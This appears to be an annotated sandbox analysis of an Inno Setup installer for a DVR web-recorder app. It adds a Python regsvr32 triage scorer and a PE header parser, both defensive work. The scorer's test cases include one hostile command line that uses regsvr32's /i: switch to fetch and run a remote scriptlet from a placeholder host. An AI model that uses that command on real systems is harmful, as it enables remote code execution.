success 0 0
1621007421.612079
NtProtectVirtualMemory
process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x1004b000
success 0 0
1621007421.612079
NtProtectVirtualMemory
process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x743c1000
success 0 0
1621007421.612079
NtProtectVirtualMemory
process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74561000
success 0 0
1621007421.690079
NtAllocateVirtualMemory
process_identifier: 2840
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02610000
success 0 0
1621007421.690079
NtAllocateVirtualMemory
process_identifier: 2840
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02620000
success 0 0
1621007430.60259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x007e0000
success 0 0
1621007430.60259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x007f0000
success 0 0
1621007430.60259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x007f0000
success 0 0
1621007430.60259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 425984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c30000
success 0 0
1621007430.99359
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77531000
success 0 0
1621007430.99359
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75a01000
success 0 0
1621007430.99359
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02e57000
success 0 0
1621007430.99359
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x0224a000
success 0 0
1621007430.99359
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02c8a000
success 0 0
1621007431.00959
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02250000
success 0 0
1621007431.00959
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 143360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x022b0000
success 0 0
1621007431.10259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02260000
success 0 0
1621007431.11859
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 159744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x022b0000
success 0 0
1621007431.14959
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x022b0000
success 0 0
1621007431.14959
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 598016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x030f0000
success 0 0
1621007431.35259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x022c0000
success 0 0
1621007431.36859
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 352256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x030f0000
success 0 0
1621007431.44659
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x022d0000
success 0 0
1621007431.50959
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 360448
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x030f0000
success 0 0
Creates executable files on the filesystem (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\is-T9ON8.tmp\_isetup\_shfoldr.dll
Creates a suspicious process (4 events)
All four are silent (/s) registrations of OCX components the installer itself placed under C:\Program Files (x86)\webrec\Single, i.e. the post-copy COM registration step of an installer rather than regsvr32 abuse; each of the four processes is also where one group of the PECompact exceptions above was raised.
cmdline "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\DHDeviceConfig.ocx"
cmdline "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\webrec.ocx"
cmdline "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\DvrInterVideo.ocx"
cmdline "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\VideoWindow.ocx"
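The four command lines above all look alike to a rule that simply flags regsvr32.exe, yet they carry the features that separate an installer's own COM registration from the patterns a hunter cares about: the switch set, whether /i: points at a URL, and where the module lives. The following scoring function is an added example, not the sandbox's own logic. It assumes a simplified Windows quoting rule (double quotes group, no escape sequences), and the two command lines marked as constructed are made up for contrast and do not appear in the report.

```python
"""Score regsvr32 command lines: installer registration vs. abuse patterns."""
import ntpath
import re

# The four command lines from the report.
REPORT_CMDLINES = [
    r'"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\DHDeviceConfig.ocx"',
    r'"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\webrec.ocx"',
    r'"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\DvrInterVideo.ocx"',
    r'"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\VideoWindow.ocx"',
]
# Constructed contrast cases (not from the report).
CONSTRUCTED_CMDLINES = [
    r'regsvr32.exe /s "C:\Users\alice\AppData\Local\Temp\helper.dll"',
    r'regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll',
]

ADMIN_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")
COM_EXTENSIONS = {".dll", ".ocx", ".ax"}


def split_windows_cmdline(cmd: str) -> list[str]:
    """Simplified Windows tokeniser (assumption): quoted runs group, no escapes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def triage_regsvr32(cmd: str) -> dict:
    argv = split_windows_cmdline(cmd)
    if not argv or ntpath.basename(argv[0]).lower() != "regsvr32.exe":
        raise ValueError("not a regsvr32 command line")
    switches = [a for a in argv[1:] if a.startswith("/")]
    flags = {s.lower().split(":", 1)[0] for s in switches}
    install_arg = next((s.split(":", 1)[1] for s in switches if s.lower().startswith("/i:")), None)
    module = next((a for a in argv[1:] if not a.startswith("/")), "")
    mod_lower = module.lower()

    reasons = []
    if install_arg and re.match(r"(?i)https?://", install_arg):
        reasons.append("/i: points at a URL (scriptlet fetched over the network)")
    if "/n" in flags:
        reasons.append("/n skips DllRegisterServer, so the module's DllInstall runs instead")
    if module and ntpath.splitext(mod_lower)[1] not in COM_EXTENSIONS:
        reasons.append(f"unusual module extension: {module}")
    if any(marker in mod_lower for marker in USER_WRITABLE):
        reasons.append("module lives in a user-writable location")

    if reasons:
        risk = "high" if any(r.startswith(("/i:", "/n")) for r in reasons) else "medium"
    elif mod_lower.startswith(ADMIN_ROOTS):
        risk = "low"
        reasons.append("silent registration of a module under an admin-only path (typical installer step)")
    else:
        risk = "medium"
        reasons.append("module path outside the usual install roots")
    return {"module": module, "flags": sorted(flags), "risk": risk, "reasons": reasons}


if __name__ == "__main__":
    for cmd in REPORT_CMDLINES + CONSTRUCTED_CMDLINES:
        verdict = triage_regsvr32(cmd)
        print(f"{verdict['risk']:6} {verdict['module']}  {'; '.join(verdict['reasons'])}")
```

The report's four lines come out "low" (silent registration under Program Files (x86)); the constructed Temp-directory case comes out "medium" and the constructed /n /i:http case "high". Parent-process context (here the is-EB9J7.tmp second-stage installer) would sharpen this further, but the report does not record it, so the function does not assume it.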
Drops an executable to the user AppData folder (3 events)
The is-T9ON8.tmp and is-EB9J7.tmp directories, _isetup\_shfoldr.dll and _RegDLL.tmp are Inno Setup's own temporary helpers; d9b4cd775a5c49cc3b6a04f71fcb5938.tmp is the installer's extracted second stage.
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\is-T9ON8.tmp\_isetup\_shfoldr.dll
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\is-EB9J7.tmp\d9b4cd775a5c49cc3b6a04f71fcb5938.tmp
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\is-T9ON8.tmp\_isetup\_RegDLL.tmp
File has been identified by one AntiVirus engine on VirusTotal as malicious (1 event)
F-Prot W32/Downloader.F.gen!Eldorado
The !Eldorado suffix marks F-Prot's heuristic engine rather than a signature match. It is the only detection recorded anywhere in this report and the source of the ELDORADO name in the page header.
Queries for potentially installed applications (4 events)
The key queried is the installer's own Inno Setup uninstall entry (the _is1 suffix on the application GUID), under HKCU (0x80000001) and HKLM (0x80000002); return value 2 is ERROR_FILE_NOT_FOUND, so this is the installer checking for a previous installation of itself, not reconnaissance of other software.
Time & API Arguments Status Return Repeated
1621007384.903876
RegOpenKeyExA
access: 0x00000001
base_handle: 0x80000001
key_handle: 0x00000000
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
options: 0
failed 2 0
1621007384.903876
RegOpenKeyExA
access: 0x00000001
base_handle: 0x80000002
key_handle: 0x00000000
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
options: 0
failed 2 0
1621007436.060876
RegOpenKeyExA
access: 0x00000008
base_handle: 0x80000001
key_handle: 0x00000000
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
options: 0
failed 2 0
1621007436.060876
RegOpenKeyExA
access: 0x00000008
base_handle: 0x80000002
key_handle: 0x00000000
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
options: 0
failed 2 0
Visual analysis
Binary image
No binary image: the sample did not produce a binary visualization image.
Runtime screenshots
No screenshots: none were captured while the sample ran.


PE Compile Time

1992-06-20 06:22:17

This is the fixed TimeDateStamp 0x2A425E19 that the Delphi linker writes into every binary it produces (1992-06-19 22:22:17 UTC, rendered here in UTC+8), not a real build date. Together with the CODE/DATA/BSS section names it marks the file as a Delphi-built executable, which is what an Inno Setup stub is.
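The compile time above and the CODE/DATA/BSS section names in the static indicators are the two header fields that identify a Delphi-built stub, and both can be read with a few struct calls rather than a full PE library. The parser below is an added example, not the sandbox's own code. It assumes that 0x2A425E19 is the constant TimeDateStamp the Delphi linker writes (1992-06-19 22:22:17 UTC) and that CODE, DATA and BSS are its default section names; the PE it parses is a constructed header-only stub built in the same function, not the sample from this report.

```python
"""Read TimeDateStamp and section names from a PE header and check the Delphi tells."""
import datetime
import struct

DELPHI_TIMESTAMP = 0x2A425E19                 # assumption: Delphi linker's fixed timestamp
BORLAND_SECTION_NAMES = {"CODE", "DATA", "BSS"}  # assumption: Delphi default section names

# Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
# SizeOfOptionalHeader, Characteristics
COFF_FMT = "<HHIIIHH"
# Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, PointerToRelocations,
# PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"


def parse_pe(data: bytes) -> dict:
    """Minimal header walk: DOS header -> e_lfanew -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, data, coff)
    table = coff + struct.calcsize(COFF_FMT) + opt_size   # section table follows the optional header
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(SECTION_FMT, data, table + i * 40)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize,
            "raw_size": rawsize, "raw_ptr": rawptr, "characteristics": chars,
        })
    return {
        "machine": machine,
        "timestamp": timestamp,
        "compile_time_utc": datetime.datetime.fromtimestamp(timestamp, datetime.timezone.utc),
        "sections": sections,
    }


def compile_time_in(info: dict, utc_offset_hours: int) -> str:
    """Render the timestamp the way a sandbox in that timezone prints it."""
    tz = datetime.timezone(datetime.timedelta(hours=utc_offset_hours))
    return info["compile_time_utc"].astimezone(tz).strftime("%Y-%m-%d %H:%M:%S")


def assess(info: dict) -> list[str]:
    """Return the Delphi tells that are present, in a fixed order."""
    tells = []
    if info["timestamp"] == DELPHI_TIMESTAMP:
        tells.append("delphi-fixed-timestamp")
    names = {s["name"] for s in info["sections"]}
    if BORLAND_SECTION_NAMES <= names:
        tells.append("borland-section-names")
    return tells


def build_sample_pe() -> bytes:
    """Constructed header-only PE32 with the layout a Delphi linker produces (not the real sample)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew -> PE signature at 0x40
    opt_size = 224                                      # PE32 optional header size
    coff = struct.pack(COFF_FMT, 0x14C, 3, DELPHI_TIMESTAMP, 0, 0, opt_size, 0x010F)
    optional = struct.pack("<H", 0x10B) + bytes(opt_size - 2)   # Magic PE32, rest zeroed
    layout = [  # name, VirtualAddress, size, Characteristics
        (b"CODE", 0x1000, 0xA000, 0x60000020),          # code, execute | read
        (b"DATA", 0xB000, 0x5000, 0xC0000040),          # initialised data, read | write
        (b"BSS", 0x10000, 0x1000, 0xC0000080),          # uninitialised data, read | write
    ]
    table = b"".join(
        struct.pack(SECTION_FMT, n, size, va, size, 0, 0, 0, 0, 0, ch) for n, va, size, ch in layout
    )
    return bytes(dos) + b"PE\0\0" + coff + optional + table


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print(info["compile_time_utc"], compile_time_in(info, 8), [s["name"] for s in info["sections"]])
    print(assess(info))
```

To run it on a real file, replace build_sample_pe() with open(path, "rb").read(); the parser reads only the headers, so it is safe to point at the installer stub itself. compile_time_in(info, 8) reproduces the report's 1992-06-20 06:22:17 from the UTC value, which is how a UTC+8 sandbox displays the Delphi constant.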

Imports

Library kernel32.dll:
0x40d0c4 VirtualFree
0x40d0c8 VirtualAlloc
0x40d0cc LocalFree
0x40d0d0 LocalAlloc
0x40d0d4 WideCharToMultiByte
0x40d0d8 TlsSetValue
0x40d0dc TlsGetValue
0x40d0e0 MultiByteToWideChar
0x40d0e4 GetModuleHandleA
0x40d0e8 GetLastError
0x40d0ec GetCommandLineA
0x40d0f0 WriteFile
0x40d0f4 SetFilePointer
0x40d0f8 SetEndOfFile
0x40d0fc RtlUnwind
0x40d100 ReadFile
0x40d104 RaiseException
0x40d108 GetStdHandle
0x40d10c GetFileSize
0x40d110 GetSystemTime
0x40d114 GetFileType
0x40d118 ExitProcess
0x40d11c CreateFileA
0x40d120 CloseHandle
Library user32.dll:
0x40d128 MessageBoxA
Library oleaut32.dll:
0x40d130 VariantChangeTypeEx
0x40d134 VariantCopyInd
0x40d138 VariantClear
0x40d13c SysStringLen
0x40d140 SysAllocStringLen
Library advapi32.dll:
0x40d148 RegQueryValueExA
0x40d14c RegOpenKeyExA
0x40d150 RegCloseKey
0x40d154 OpenProcessToken
Library kernel32.dll:
0x40d160 WriteFile
0x40d164 VirtualQuery
0x40d168 VirtualProtect
0x40d16c VirtualFree
0x40d170 VirtualAlloc
0x40d174 Sleep
0x40d178 SizeofResource
0x40d17c SetLastError
0x40d180 SetFilePointer
0x40d184 SetErrorMode
0x40d188 SetEndOfFile
0x40d18c RemoveDirectoryA
0x40d190 ReadFile
0x40d194 LockResource
0x40d198 LoadResource
0x40d19c LoadLibraryA
0x40d1a0 IsDBCSLeadByte
0x40d1a8 GetVersionExA
0x40d1b0 GetSystemInfo
0x40d1b8 GetProcAddress
0x40d1bc GetModuleHandleA
0x40d1c0 GetModuleFileNameA
0x40d1c4 GetLocaleInfoA
0x40d1c8 GetLastError
0x40d1cc GetFullPathNameA
0x40d1d0 GetFileSize
0x40d1d4 GetFileAttributesA
0x40d1d8 GetExitCodeProcess
0x40d1e0 GetCurrentProcess
0x40d1e4 GetCommandLineA
0x40d1e8 GetACP
0x40d1ec InterlockedExchange
0x40d1f0 FormatMessageA
0x40d1f4 FindResourceA
0x40d1f8 DeleteFileA
0x40d1fc CreateProcessA
0x40d200 CreateFileA
0x40d204 CreateDirectoryA
0x40d208 CloseHandle
Library user32.dll:
0x40d210 TranslateMessage
0x40d214 SetWindowLongA
0x40d218 PeekMessageA
0x40d220 MessageBoxA
0x40d224 LoadStringA
0x40d228 ExitWindowsEx
0x40d22c DispatchMessageA
0x40d230 DestroyWindow
0x40d234 CreateWindowExA
0x40d238 CallWindowProcA
0x40d23c CharPrevA
Library comctl32.dll:
0x40d244 InitCommonControls
Library advapi32.dll:

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49202 203.208.41.98 update.googleapis.com 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 53380 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 60384 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 62912 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Dropped files

No dropped files.

Dropped buffers

No dropped buffers.